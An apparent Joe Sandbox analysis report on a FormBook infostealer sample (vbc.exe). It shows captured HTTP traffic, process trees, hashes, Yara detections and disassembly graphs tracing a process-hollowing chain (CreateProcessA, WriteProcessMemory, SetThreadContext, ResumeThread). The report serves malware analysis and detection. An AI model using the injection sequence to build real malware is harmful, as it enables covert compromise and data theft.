6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; } h1 strong { font-weight:
                                                Aug 8, 2022 16:11:30.095129013 CEST11277INData Raw: 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #
                                                Aug 8, 2022 16:11:30.095169067 CEST11278INData Raw: 72 61 74 6f 72 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20
                                                Data Ascii: rator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is dist


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:16:09:21
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\vbc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\vbc.exe"
                                                Imagebase:0x4d0000
                                                File size:794112 bytes
                                                MD5 hash:BA5FA6EE78FE62B57CE7947F6BDB86FF
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Target ID:5
                                                Start time:16:09:34
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\vbc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\Desktop\vbc.exe
                                                Imagebase:0x100000
                                                File size:794112 bytes
                                                MD5 hash:BA5FA6EE78FE62B57CE7947F6BDB86FF
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                General

                                                Target ID:6
                                                Start time:16:09:36
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\vbc.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\vbc.exe
                                                Imagebase:0xb00000
                                                File size:794112 bytes
                                                MD5 hash:BA5FA6EE78FE62B57CE7947F6BDB86FF
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Target ID:7
                                                Start time:16:09:44
                                                Start date:08/08/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff77c400000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Target ID:13
                                                Start time:16:10:22
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\control.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\control.exe
                                                Imagebase:0xaf0000
                                                File size:114688 bytes
                                                MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:6.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:117
                                                  Total number of Limit Nodes:5
                                                  execution_graph 27981 709f5d8 27982 709f620 WriteProcessMemory 27981->27982 27984 709f677 27982->27984 27989 709f4e8 27990 709f528 VirtualAllocEx 27989->27990 27992 709f565 27990->27992 27993 709f6f8 27994 709f743 ReadProcessMemory 27993->27994 27996 709f787 27994->27996 27997 2659e10 27998 2659e1f 27997->27998 28000 2659f08 27997->28000 28001 2659f1b 28000->28001 28003 2659f33 28001->28003 28008 265a181 28001->28008 28012 265a190 28001->28012 28002 2659f2b 28002->28003 28004 265a130 GetModuleHandleW 28002->28004 28003->27998 28005 265a15d 28004->28005 28005->27998 28009 265a1a4 28008->28009 28011 265a1c9 28009->28011 28016 2659468 28009->28016 28011->28002 28013 265a1a4 28012->28013 28014 2659468 LoadLibraryExW 28013->28014 28015 265a1c9 28013->28015 28014->28015 28015->28002 28017 265a370 LoadLibraryExW 28016->28017 28019 265a3e9 28017->28019 28019->28011 28020 26540d0 28021 26540e2 28020->28021 28022 26540ee 28021->28022 28026 26541e0 28021->28026 28031 265388c 28022->28031 28024 265410d 28027 2654205 28026->28027 28035 26542d1 28027->28035 28039 26542e0 28027->28039 28032 2653897 28031->28032 28047 2655b4c 28032->28047 28034 26571fa 28034->28024 28037 2654307 28035->28037 28036 26543e4 28036->28036 28037->28036 28043 2653e18 28037->28043 28040 2654307 28039->28040 28041 26543e4 28040->28041 28042 2653e18 CreateActCtxA 28040->28042 28042->28041 28044 2655370 CreateActCtxA 28043->28044 28046 2655433 28044->28046 28046->28046 28048 2655b57 28047->28048 28051 2656f28 28048->28051 28050 265731d 28050->28034 28052 2656f33 28051->28052 28055 2656f58 28052->28055 28054 26573fa 28054->28050 28056 2656f63 28055->28056 28059 2656f88 28056->28059 28058 26574ea 28058->28054 28060 2656f93 28059->28060 28061 2657c3c 28060->28061 28064 265bf20 28060->28064 28070 265bf10 28060->28070 28061->28058 28065 265bf41 28064->28065 28069 265bf65 28065->28069 28076 265c0c0 28065->28076 28080 265c08d 28065->28080 28085 265c0d0 28065->28085 28069->28061 28071 265bf41 28070->28071 28072 265bf65 28071->28072 28073 265c0c0 2 API calls 28071->28073 28074 265c0d0 2 API calls 28071->28074 28075 265c08d 2 API calls 28071->28075 28072->28061 28073->28072 28074->28072 28075->28072 28077 265c0dd 28076->28077 28078 265c117 28077->28078 28089 265b594 28077->28089 28078->28069 28081 265c0a3 28080->28081 28082 265c0eb 28080->28082 28081->28069 28083 265b594 2 API calls 28082->28083 28084 265c117 28082->28084 28083->28084 28084->28069 28086 265c0dd 28085->28086 28087 265b594 2 API calls 28086->28087 28088 265c117 28086->28088 28087->28088 28088->28069 28090 265b59f 28089->28090 28092 265ca08 28090->28092 28093 265b67c 28090->28093 28094 265b687 28093->28094 28095 2656f88 2 API calls 28094->28095 28096 265ce77 28094->28096 28095->28096 28100 265e7f0 28096->28100 28105 265e808 28096->28105 28097 265ceb0 28097->28092 28101 265e7d6 28100->28101 28102 265e7fa 28100->28102 28101->28097 28102->28101 28103 265f077 LoadLibraryExW GetModuleHandleW 28102->28103 28104 265f088 LoadLibraryExW GetModuleHandleW 28102->28104 28103->28101 28104->28101 28107 265e839 28105->28107 28108 265e885 28105->28108 28106 265e845 28106->28097 28107->28106 28109 265f077 LoadLibraryExW GetModuleHandleW 28107->28109 28110 265f088 LoadLibraryExW GetModuleHandleW 28107->28110 28108->28097 28109->28108 28110->28108 27985 709f350 27986 709f395 SetThreadContext 27985->27986 27988 709f3dd 27986->27988 28111 709f270 28112 709f2b0 ResumeThread 28111->28112 28114 709f2e1 28112->28114 28115 709f8f0 28116 709f979 CreateProcessA 28115->28116 28118 709fb3b 28116->28118 27967 265c1e8 27968 265c24e 27967->27968 27969 265c2fd 27968->27969 27972 265c3a8 27968->27972 27975 265c398 27968->27975 27978 265b61c 27972->27978 27976 265c3d6 27975->27976 27977 265b61c DuplicateHandle 27975->27977 27976->27969 27977->27976 27979 265c410 DuplicateHandle 27978->27979 27980 265c3d6 27979->27980 27980->27969

                                                  Executed Functions

                                                  Function 07095DF0 Relevance: .7, Instructions: 653COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f7f655d6c56c8c20f9cbb4e7f22c48c0b8530ba0b6d9f11550b85f1401967ed
                                                  • Instruction ID: 607fae78fb2435617d3cdc679af217f9eddbaef747b071360d2ab4612d665360
                                                  • Opcode Fuzzy Hash: 4f7f655d6c56c8c20f9cbb4e7f22c48c0b8530ba0b6d9f11550b85f1401967ed
                                                  • Instruction Fuzzy Hash: 8D62E575A00628CFDB65CF69C944AD9BBB2FF89304F1581E9E509AB321DB319E81DF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07095DE1 Relevance: .3, Instructions: 253COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53caa3a14cafed91055f2450516d1a1a5e905f54f7dcd88f04e9ae288494f230
                                                  • Instruction ID: 68353939350e06c0115a46f7f0cf54d3a38a4bf83a5e72ece42c68ad7d331a80
                                                  • Opcode Fuzzy Hash: 53caa3a14cafed91055f2450516d1a1a5e905f54f7dcd88f04e9ae288494f230
                                                  • Instruction Fuzzy Hash: 85C18775E016188FDB58CF6AC944AD9BBF2AF89304F14C1EAD809AB364DB315A85CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0709F8F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 709f8f0-709f985 2 709f9be-709f9de 0->2 3 709f987-709f991 0->3 8 709f9e0-709f9ea 2->8 9 709fa17-709fa46 2->9 3->2 4 709f993-709f995 3->4 6 709f9b8-709f9bb 4->6 7 709f997-709f9a1 4->7 6->2 10 709f9a3 7->10 11 709f9a5-709f9b4 7->11 8->9 13 709f9ec-709f9ee 8->13 17 709fa48-709fa52 9->17 18 709fa7f-709fb39 CreateProcessA 9->18 10->11 11->11 12 709f9b6 11->12 12->6 14 709fa11-709fa14 13->14 15 709f9f0-709f9fa 13->15 14->9 19 709f9fc 15->19 20 709f9fe-709fa0d 15->20 17->18 21 709fa54-709fa56 17->21 31 709fb3b-709fb41 18->31 32 709fb42-709fbc8 18->32 19->20 20->20 22 709fa0f 20->22 23 709fa79-709fa7c 21->23 24 709fa58-709fa62 21->24 22->14 23->18 26 709fa64 24->26 27 709fa66-709fa75 24->27 26->27 27->27 28 709fa77 27->28 28->23 31->32 42 709fbd8-709fbdc 32->42 43 709fbca-709fbce 32->43 45 709fbec-709fbf0 42->45 46 709fbde-709fbe2 42->46 43->42 44 709fbd0 43->44 44->42 48 709fc00-709fc04 45->48 49 709fbf2-709fbf6 45->49 46->45 47 709fbe4 46->47 47->45 51 709fc16-709fc1d 48->51 52 709fc06-709fc0c 48->52 49->48 50 709fbf8 49->50 50->48 53 709fc1f-709fc2e 51->53 54 709fc34 51->54 52->51 53->54
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0709FB26
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: ee7aff9b26752e282ccacef3e4ae487ddc18eac5e2241b9875178d31dfc766e6
                                                  • Instruction ID: ff62c845588bf851ee4cb417771d34236aa89b97b8135b7d3c8cd13861c1b475
                                                  • Opcode Fuzzy Hash: ee7aff9b26752e282ccacef3e4ae487ddc18eac5e2241b9875178d31dfc766e6
                                                  • Instruction Fuzzy Hash: 339149B1D0021ADFDF10DFA8C841BDEBBB2BB48314F148669D849E7280DB74A985DF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02659F08 Relevance: 1.7, APIs: 1, Instructions: 190COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 56 2659f08-2659f1d call 26582a8 59 2659f33-2659f37 56->59 60 2659f1f 56->60 61 2659f39-2659f43 59->61 62 2659f4b-2659f8c 59->62 109 2659f25 call 265a181 60->109 110 2659f25 call 265a190 60->110 61->62 67 2659f8e-2659f96 62->67 68 2659f99-2659fa7 62->68 63 2659f2b-2659f2d 63->59 64 265a068-265a128 63->64 104 265a130-265a15b GetModuleHandleW 64->104 105 265a12a-265a12d 64->105 67->68 70 2659fa9-2659fae 68->70 71 2659fcb-2659fcd 68->71 72 2659fb0-2659fb7 call 2659410 70->72 73 2659fb9 70->73 74 2659fd0-2659fd7 71->74 76 2659fbb-2659fc9 72->76 73->76 77 2659fe4-2659feb 74->77 78 2659fd9-2659fe1 74->78 76->74 81 2659fed-2659ff5 77->81 82 2659ff8-265a001 call 2659420 77->82 78->77 81->82 87 265a003-265a00b 82->87 88 265a00e-265a013 82->88 87->88 89 265a015-265a01c 88->89 90 265a031-265a035 88->90 89->90 91 265a01e-265a02e call 2659430 call 2659440 89->91 94 265a03b-265a03e 90->94 91->90 97 265a061-265a067 94->97 98 265a040-265a05e 94->98 98->97 106 265a164-265a178 104->106 107 265a15d-265a163 104->107 105->104 107->106 109->63 110->63
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0265A14E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.406513850.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2650000_vbc.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: c34e987ae63cc590e16e2321bdbe5f7cb7b047035d1d01258d084ff4486a9ca7
                                                  • Instruction ID: 84ed36176fac1dfbc094c3982dcfcde7faea5ac76a650438db5aadebfd2286f1
                                                  • Opcode Fuzzy Hash: c34e987ae63cc590e16e2321bdbe5f7cb7b047035d1d01258d084ff4486a9ca7
                                                  • Instruction Fuzzy Hash: 69710170A01B158FDB24DF69D54079AB7F1BF88308F008A2ED88A97B50DB75E849CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02653E18 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 111 2653e18-2655431 CreateActCtxA 114 2655433-2655439 111->114 115 265543a-2655494 111->115 114->115 122 2655496-2655499 115->122 123 26554a3-26554a7 115->123 122->123 124 26554a9-26554b5 123->124 125 26554b8 123->125 124->125 127 26554b9 125->127 127->127
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02655421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.406513850.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2650000_vbc.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 56b0d85c26e830ebcfb41ae6dc0658608d891a1747919118eb1def0d0b87c397
                                                  • Instruction ID: f8eb548424b5a53bdcecf856fa35920ce6106ccf0e23e183b48c78e75b1db7e8
                                                  • Opcode Fuzzy Hash: 56b0d85c26e830ebcfb41ae6dc0658608d891a1747919118eb1def0d0b87c397
                                                  • Instruction Fuzzy Hash: 8D41E270C00228CBDB24DFA9C9447DEBBB5BF48318F60805AD409BB351DB75698ACF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02655364 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 128 2655364-2655431 CreateActCtxA 130 2655433-2655439 128->130 131 265543a-2655494 128->131 130->131 138 2655496-2655499 131->138 139 26554a3-26554a7 131->139 138->139 140 26554a9-26554b5 139->140 141 26554b8 139->141 140->141 143 26554b9 141->143 143->143
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02655421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.406513850.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2650000_vbc.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 0df1694b8ae325afcf13ae695af0ab0706b648f17e46d5b6af426c50e0678bb5
                                                  • Instruction ID: 8a9f52424b6ed3d7dbe9818a3ad3f6968a97559038f484a3a8a1bed517dac1d5
                                                  • Opcode Fuzzy Hash: 0df1694b8ae325afcf13ae695af0ab0706b648f17e46d5b6af426c50e0678bb5
                                                  • Instruction Fuzzy Hash: C141E0B1C00229CBDB14DFA9C9847DDBBB5BF48318F60806AD409BB651DB75698ACF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0709F5D8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 144 709f5d8-709f626 146 709f628-709f634 144->146 147 709f636-709f675 WriteProcessMemory 144->147 146->147 149 709f67e-709f6ae 147->149 150 709f677-709f67d 147->150 150->149
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0709F668
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 85106157cc9391f8fce453f0b27f419f3700fea3e7cd97eecb7de5d31e8bc550
                                                  • Instruction ID: c399087623b96c387a5f4cac4e79bc715d7a24f46c84b65db75657d0fa1402f4
                                                  • Opcode Fuzzy Hash: 85106157cc9391f8fce453f0b27f419f3700fea3e7cd97eecb7de5d31e8bc550
                                                  • Instruction Fuzzy Hash: A22148B19003499FCF00CFA9C881BDEBBF5FF48314F008429E919A7650D778A944CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0265B61C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 154 265b61c-265c4a4 DuplicateHandle 156 265c4a6-265c4ac 154->156 157 265c4ad-265c4ca 154->157 156->157
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0265C3D6,?,?,?,?,?), ref: 0265C497
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.406513850.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2650000_vbc.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 65a2fc8fc31d4ab46920d21eceafe741522d8681bd07deeb40f5991f00e770ed
                                                  • Instruction ID: 8ed360258c6ffcc0e3a4ce391ebb3f49e5f1d5b9da646cd73f886311173be279
                                                  • Opcode Fuzzy Hash: 65a2fc8fc31d4ab46920d21eceafe741522d8681bd07deeb40f5991f00e770ed
                                                  • Instruction Fuzzy Hash: C321E6B59013589FDB10CF99D984AEEBBF4EB48324F14841AE954B3710D378A954CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0709F6F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 170 709f6f8-709f785 ReadProcessMemory 173 709f78e-709f7be 170->173 174 709f787-709f78d 170->174 174->173
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0709F778
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: c36dc9112daee91c18ab5aee586d3db8d43d3491afb0cee4ac8c22cffe3452da
                                                  • Instruction ID: 799412d3205d439d301b59ad3bc5137a23e1df49409752128560f41582659a4c
                                                  • Opcode Fuzzy Hash: c36dc9112daee91c18ab5aee586d3db8d43d3491afb0cee4ac8c22cffe3452da
                                                  • Instruction Fuzzy Hash: D62128B18002599FCF00DFA9C8857DEFBF5FF48324F508429E519A7650C778A944DBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0709F350 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 160 709f350-709f39b 162 709f3ab-709f3db SetThreadContext 160->162 163 709f39d-709f3a9 160->163 165 709f3dd-709f3e3 162->165 166 709f3e4-709f414 162->166 163->162 165->166
                                                  APIs
